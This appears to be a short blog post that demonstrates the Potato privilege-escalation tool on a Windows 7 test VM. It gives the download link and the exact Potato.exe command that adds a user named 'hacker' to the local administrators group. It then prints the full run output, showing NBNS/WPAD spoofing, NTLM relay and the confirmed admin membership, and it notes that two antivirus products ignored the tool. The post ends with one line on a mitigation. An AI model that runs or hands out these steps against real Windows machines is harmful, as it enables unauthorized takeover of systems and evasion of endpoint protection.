Discovered this little trick that will escalate a local user on a Windows box and give them local admin rights. The app is called Potato and its available at https://github.com/foxglovesec/Potato.
Just to see if this would really work, I setup a Windows 7 Enterprise VM. The first instance running a virus scanner (i.e., ESET) and the other running Symantec Endpoint Protection. Then I downloaded and decompressed the zip file. Neither "scanners" cared. Not necessarily exhaustive research, but as a form of stratified sampling, it will do.
So, the next logical step was to execute it. The GIT site does a great job of describing how it works and how to execute it.
From a terminal:
net localgroup administrators - to list who wasn't within the group and in this case "hacker"; then
ipconfig - to get the local IP address of the box, then I executed the following;
Potato.exe -ip 10.211.55.7 -disable_exhaust true -cmd "C:\\Windows\\System32\\cmd.exe /k net localgroup administrators hacker /add"
That resulted in the following output:
Starting NBNS spoofer...
Clearing dns and nbns cache...
Listening...
Got 127.0.0.1
Spoofed target WPAD succesfully...
Checking for windows defender updates...
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Redirecting to target..http://localhost/GETHASHES949255
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Got request for hashes...
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Parsing initial NTLM auth...
NTLM TlRMTVNTUAABAAAAB7IIogkACQA3AAAADwAPACgAAAAGAbAdAAAAD1NFQUxNSU5EU0VUQzI3Q1d
PUktHUk9VUA==
Got Request: GET http://127.0.0.1/wpad.dat!
Spoofing wpad...
Setting up SMB relay...
initSecContext - State 0
initSecContext - State 1
Adding TlRMTVNTUAACAAAAHgAeADgAAAAFwoqiISJWymDPCzaAyKUBAAAAAJgAmABWAAAABgGwHQAAA
A9TAEUAQQBMAE0ASQBOAEQAUwBFAFQAQwAyADcAQwACAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAM
gA3AEMAAQAeAFMARQBBAEwATQBJAE4ARABTAEUAVABDADIANwBDAAQAHgBTAEUAQQBMAE0ASQBOAEQAU
wBFAFQAQwAyADcAQwADAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAMgA3AEMABwAIAMCeF5u4YtEBA
AAAAA== to queue
Got SMB challenge TlRMTVNTUAACAAAAHgAeADgAAAAFwoqiISJWymDPCzaAyKUBAAAAAJgAmABWAA
AABgGwHQAAAA9TAEUAQQBMAE0ASQBOAEQAUwBFAFQAQwAyADcAQwACAB4AUwBFAEEATABNAEkATgBEAF
MARQBUAEMAMgA3AEMAAQAeAFMARQBBAEwATQBJAE4ARABTAEUAVABDADIANwBDAAQAHgBTAEUAQQBMAE
0ASQBOAEQAUwBFAFQAQwAyADcAQwADAB4AUwBFAEEATABNAEkATgBEAFMARQBUAEMAMgA3AEMABwAIAM
CeF5u4YtEBAAAAAA==
Got Request: HEAD http://localhost/GETHASHES949255!
Sending 401...
Parsing final auth...
TlRMTVNTUAADAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAA
BcKIogYBsB0AAAAPQsdH2fWtywYPgDCuRqyEqA==
Got TlRMTVNTUAADAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABYAAAAAAAAAFgAAAAAAAAAWAAAAAAAAABY
AAAABcKIogYBsB0AAAAPQsdH2fWtywYPgDCuRqyEqA==
Successfully started service
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Got Request: HEAD http://download.windowsupdate.comhttp//download.windowsupdate.
com/v9/windowsupdate/redir/muv4wuredir.cab?1602082135!
Back to the prompt so I do another net localgroup administrators and check if the user hacker privileges where indeed escalated?
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
hacker
sealmindset
The command completed successfully.
It worked.
But as the author states on the site, you can actually prevent this by enabling Extended Protection for Authentication
No comments:
Post a Comment